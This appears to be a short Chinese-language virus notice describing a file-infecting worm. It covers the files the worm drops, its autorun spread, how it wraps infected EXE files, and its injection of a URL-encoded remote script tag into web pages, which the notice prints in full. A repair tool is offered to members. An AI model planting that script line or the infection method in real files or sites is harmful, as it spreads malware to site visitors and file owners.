这个病毒,杀毒软件也能查出,查出后的操作就是删除或.隔离,不能恢复被感染的文件,有感染此类病毒的会员可以下载这个工具对感染文件进行修复。
病毒母体:lsass.exe
释放病毒:
D:\winnt\system32\com\smss.exe
D:\winnt\system32\com\lsass.exe
每个分区写入autorun.inf及病毒本身pagefile.pif(就是lsass.exe)。
感染大小为2k-15m的exe,有些没有图标的exe不进行感染。
感染后大部分程序的图标不变,少数变。
感染exe过程:
提取被感染程序的图标资源,修改到病毒自身,
写入到临时文件D:\winnt\system32\com\~,
然后将被感染程序载入,修改了特定位置的代码,然后添加到临时文件后面,
然后再载入原始病毒,添加到临时文件,
这样就完成了感染。
因此被感染文件包含2份病毒,一份获取了被感染程序的图标,一份是原始的,中间夹着修改过的被感染程序。
另外病毒也感染这几种类型的网页:
ASCII "htm"; ASCII "tml" ; ASCII "asp" ; ASCII "spx" ; ASCII "php" ; ASCII "jsp"
在末尾添加恶意网站:
"<script src="hxxp://%77%77%77%2E%79%61%79%61%64%6F%77%6E%2E%63%6F%6D/%62%32%2E%6A%73"></script>"
这个病毒,杀毒软件也能查出,查出后的操作就是删除或.隔离,不能恢复被感染的文件,有感染此类病毒的会员可以下载这个工具对感染文件进行修复。
京公网安备 11010802021500号